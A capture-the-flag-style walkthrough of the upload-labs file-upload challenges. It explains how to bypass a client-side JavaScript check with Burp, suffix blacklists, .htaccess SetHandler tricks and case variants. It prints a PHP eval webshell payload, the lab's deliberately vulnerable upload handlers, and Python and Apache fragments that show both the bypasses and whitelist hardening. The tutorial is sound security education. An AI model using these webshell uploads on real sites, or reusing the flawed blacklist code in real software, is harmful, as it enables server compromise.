upload-labs Walkthrough
The environment used in this article comes from:
https://github.com/c0ny1/upload-labs
First, a mind map of all the bypass methods covered below.
Client side
1. JS check
Pass 01
Upload pages commonly carry a JavaScript routine that validates the upload by checking the file's suffix, either against a whitelist or against a blacklist.
Viewing the page source shows that the upload file type is restricted by such a script.
Bypass methods
(1) Delete the file-validation code from the form's onsubmit handler. Alternatively, disable JavaScript in the browser, or copy the HTML source to a local file, remove the check there, and submit the form from that local copy to the same action URL.
(2) Modify the request in Burp. Since the check is front-end JavaScript only, rename the file to a suffix the script allows (for example shell.php to shell.jpg), intercept the upload with Burp, and change the filename parameter of the multipart part back to the .php suffix. The server only ever sees what that parameter says; the browser check has already run and cannot run again.
Upload successful.
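The two-step bypass from (2), worked through offline as an added example (this is not the lab's code): a stand-in for the front-end suffix whitelist (the page only says the JS checks the suffix, so the .jpg/.png/.gif list, the form field names and the sample payload are assumptions), the multipart body a browser would build for the renamed file, the Burp edit that rewrites only the filename parameter, and the value PHP then exposes as $_FILES['upload_file']['name'].

```python
"""Pass-01: the JavaScript suffix check runs in the browser, so the server only ever
sees the filename the multipart body carries.  Added example, not the lab's code."""
import re

# Assumed front-end whitelist; the page only says the JS validates the suffix.
JS_ALLOWED = ('.jpg', '.png', '.gif')


def client_js_check(local_name):
    """What the browser-side check inspects: the suffix of the file the user picked."""
    dot = local_name.rfind('.')
    return dot != -1 and local_name[dot:].lower() in JS_ALLOWED


def build_upload_body(boundary, field, filename, content_type, data):
    """The multipart/form-data body a browser sends for the lab's form (field names assumed)."""
    head = (
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f'Content-Type: {content_type}\r\n\r\n'
    ).encode()
    tail = (
        f'\r\n--{boundary}\r\n'
        f'Content-Disposition: form-data; name="submit"\r\n\r\n'
        f'upload\r\n--{boundary}--\r\n'
    ).encode()
    return head + data + tail


def burp_rename(body, new_filename):
    """The Burp edit from step (2): rewrite only the filename parameter of the file part.
    The file bytes are untouched, and no JavaScript runs at this point."""
    return re.sub(rb'filename="[^"]*"',
                  lambda m: b'filename="' + new_filename.encode() + b'"',
                  body, count=1)


def server_filename(body):
    """What PHP exposes as $_FILES['upload_file']['name']: the filename parameter, verbatim."""
    m = re.search(rb'filename="([^"]*)"', body)
    return m.group(1).decode() if m else None


def pass01_bypass(boundary='----WebKitFormBoundary7MA4YWxkTrZu0gW'):
    """Rename locally to satisfy the JS, upload, then restore the real suffix in transit."""
    payload = b'<?php @eval($_POST["cmd"]); ?>'   # constructed sample content for the demo
    php_passes_js = client_js_check('shell.php')  # False: the browser would refuse this name
    jpg_passes_js = client_js_check('shell.jpg')  # True: the renamed copy is accepted
    body = build_upload_body(boundary, 'upload_file', 'shell.jpg', 'image/jpeg', payload)
    body = burp_rename(body, 'shell.php')         # what Burp does to the intercepted request
    return {
        'js_blocks_php': not php_passes_js,
        'js_allows_jpg': jpg_passes_js,
        'server_sees': server_filename(body),
        'payload_intact': payload in body,
    }


if __name__ == '__main__':
    print(pass01_bypass())
```

The part's Content-Type header is client-controlled in exactly the same way, which is why nothing the browser asserts about an upload can be trusted server-side.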
Server side
Extension check
Blacklist
1. Upload an alternative suffix that the server still executes
Pass 03
This pass uses a blacklist, so it can be bypassed with a suffix that is not on the list but that the web server still maps to the PHP interpreter.
Bypass method:
As summarized in the file upload vulnerability notes, suffixes such as php3 and phtml work here. The caveat is that they only execute when Apache's configuration maps them to PHP (an AddType/AddHandler line, or the FilesMatch pattern in the PHP module config, covering .php3, .phtml and so on); on a host that maps only .php, the file is uploaded but served as plain text.
2. Upload .htaccess
Pass-04
.htaccess is a per-directory configuration file for the Apache server. It applies to the directory it sits in (and its subdirectories) and can be used for 301 redirects, custom 404 pages, changing how file extensions are handled, allowing or blocking access for particular users or to particular directories, disabling directory listings, setting the default document, and more. Apache honours it only where the main configuration grants AllowOverride for the relevant directive class (FileInfo for handler directives such as SetHandler).
Viewing the source shows a blacklist check:
```php
<?php
// Pass-04 upload handler as shipped by the lab; deldot() and UPLOAD_PATH come from its common.php
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        // Note: "php1" and "pHp1" lack the leading dot, so a ".php1" suffix never matches them
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // lowercase the suffix
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name; // stored under the client-supplied name
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}
?>
```
But the blacklist does not include .htaccess, and the file is stored under its original name, so an uploaded .htaccess lands in the upload directory intact.
Bypass method:
Upload a file named .htaccess with the content:
```apache
SetHandler application/x-httpd-php
```
With that in place Apache hands every file in the upload directory to the PHP module regardless of suffix, so an image shell (say shell.jpg) uploaded next can be requested and is executed as PHP.
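Two configuration fragments added here as examples (not from the lab or its author): a scoped version of the .htaccess payload above, and the Apache directory settings that make this pass fail. The upload directory path and the shell filename are assumed.

```apache
# (a) Attacker side: the .htaccess placed in the upload directory.
# The bare SetHandler above hands every file in the directory to PHP, which also
# breaks any legitimate images served from it; scoping it to one name is quieter.
<FilesMatch "^shell\.jpg$">
    SetHandler application/x-httpd-php
</FilesMatch>

# (b) Defender side, in httpd.conf or the vhost (path assumed).
# AllowOverride None makes Apache ignore .htaccess here, so the upload is inert;
# the remaining directives stop PHP execution even if a script does land on disk.
<Directory "/var/www/html/upload">
    AllowOverride None
    # php_admin_flag applies to mod_php only; the FilesMatch below also covers php-fpm setups
    php_admin_flag engine Off
    <FilesMatch "\.(php[2-7]?|pht|phtml|htaccess)$">
        Require all denied
    </FilesMatch>
</Directory>
```

Whether the payload took effect is easy to check: request the uploaded shell.jpg once the .htaccess is in place. PHP output means FileInfo overrides are enabled; the raw image bytes coming back means AllowOverride does not permit FileInfo (or is None); a 500 means Apache read the file but rejected a directive in it. `Require all denied` is Apache 2.4 syntax.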
3. Suffix case bypass
Pass-05
Viewing the source shows that .htaccess is now on the blacklist, but the suffix is no longer lowercased before the comparison (the strtolower call is gone), so the check is case sensitive: .pHp is listed, for instance, while .Php and .PHP are not.
```php
<?php
// Pass-05 upload handler as shipped by the lab; deldot() and UPLOAD_PATH come from its common.php
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the name
        $file_ext = strrchr($file_name, '.');
        // no strtolower() here: the comparison below is case sensitive
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; // random name, original suffix kept
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
```
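The Pass-03, Pass-04 and Pass-05 checks re-implemented in Python as an added example (not the lab's code), so the three blacklists can be run side by side against a constructed set of filenames next to a whitelist version that rejects all of them. The PHP helpers (trim, deldot, strrchr, str_ireplace) are emulated; the Pass-04 and Pass-05 lists are copied from the source above, while the Pass-03 list does not appear on this page and is assumed to be the lab's four-entry list.

```python
"""Re-implement the suffix checks of upload-labs Pass-03/04/05 to see which names slip
past each one, beside a whitelist version that stops them all.  Added example; the PHP
helpers are emulated here, this is not the lab's code."""
import re
import secrets

# Pass-03's list does not appear on the page; assumed to be the lab's four-entry list.
PASS03_DENY = ['.asp', '.aspx', '.php', '.jsp']
# Pass-04's list exactly as in the source: note "php1" and "pHp1" lack the leading dot.
PASS04_DENY = [
    '.php', '.php5', '.php4', '.php3', '.php2', 'php1', '.html', '.htm', '.phtml', '.pht',
    '.pHp', '.pHp5', '.pHp4', '.pHp3', '.pHp2', 'pHp1', '.Html', '.Htm', '.pHtml',
    '.jsp', '.jspa', '.jspx', '.jsw', '.jsv', '.jspf', '.jtml', '.jSp', '.jSpx', '.jSpa',
    '.jSw', '.jSv', '.jSpf', '.jHtml', '.asp', '.aspx', '.asa', '.asax', '.ascx', '.ashx',
    '.asmx', '.cer', '.aSp', '.aSpx', '.aSa', '.aSax', '.aScx', '.aShx', '.aSmx', '.cEr',
    '.sWf', '.swf',
]
# Pass-05's list: the same entries minus the two dotless ones, plus .htaccess.
PASS05_DENY = [e for e in PASS04_DENY if e not in ('php1', 'pHp1')] + ['.htaccess']

PHP_TRIM_CHARS = ' \t\n\r\0\x0b'   # the default character set stripped by PHP's trim()


def php_trim(s):
    return s.strip(PHP_TRIM_CHARS)


def deldot(s):
    """The lab's deldot(): drop every trailing dot from the name."""
    return s.rstrip('.')


def strrchr(s, ch):
    """PHP strrchr(): from the last occurrence of ch to the end; '' when absent."""
    i = s.rfind(ch)
    return s[i:] if i >= 0 else ''


def lab_ext(name, lowercase):
    """The value the lab compares against its blacklist (same pipeline as the PHP above)."""
    name = deldot(php_trim(name))
    ext = strrchr(name, '.')
    if lowercase:                        # Pass-03 and Pass-04 call strtolower(); Pass-05 does not
        ext = ext.lower()
    ext = re.sub(re.escape('::$DATA'), '', ext, flags=re.IGNORECASE)   # str_ireplace
    return php_trim(ext)


def pass03_accepts(name):
    return lab_ext(name, lowercase=True) not in PASS03_DENY


def pass04_accepts(name):
    return lab_ext(name, lowercase=True) not in PASS04_DENY


def pass05_accepts(name):
    return lab_ext(name, lowercase=False) not in PASS05_DENY


ALLOWED = {'.jpg', '.jpeg', '.png', '.gif'}   # whitelist: anything else is rejected


def whitelist_store_name(name):
    """Hardened check: whitelist the lowercased suffix, skip deldot() so a trailing dot is
    not silently forgiven, and never reuse the client's name on disk.
    Returns the server-chosen filename, or None when the upload is rejected."""
    ext = strrchr(php_trim(name), '.').lower()
    if ext not in ALLOWED:
        return None
    return secrets.token_hex(8) + ext


# Constructed candidate names covering the three passes' bypasses.
CANDIDATES = ['shell.php', 'shell.php3', 'shell.phtml', 'shell.PHP', 'shell.pHp',
              '.htaccess', 'shell.php1', 'shell.php::$DATA', 'cat.jpg']


def survey(candidates=CANDIDATES):
    """For each name: True where that check lets it through."""
    return {
        n: {
            'pass03': pass03_accepts(n),
            'pass04': pass04_accepts(n),
            'pass05': pass05_accepts(n),
            'whitelist': whitelist_store_name(n) is not None,
        }
        for n in candidates
    }


if __name__ == '__main__':
    for name, row in survey().items():
        print(f'{name:18} ' + '  '.join(f'{k}={v!s:5}' for k, v in row.items()))
```

Running the survey shows the shape of the problem: .php3 and .phtml pass Pass-03, .htaccess and (because of the missing dot in the list) .php1 pass Pass-04, .PHP passes Pass-05, and the ::$DATA suffix is correctly stripped by all three. The whitelist rejects every candidate except cat.jpg, and storing under a server-chosen name means a name like shell.php.jpg never reaches disk as typed, which matters on hosts where Apache's AddHandler maps each .php segment of a multi-extension name to PHP.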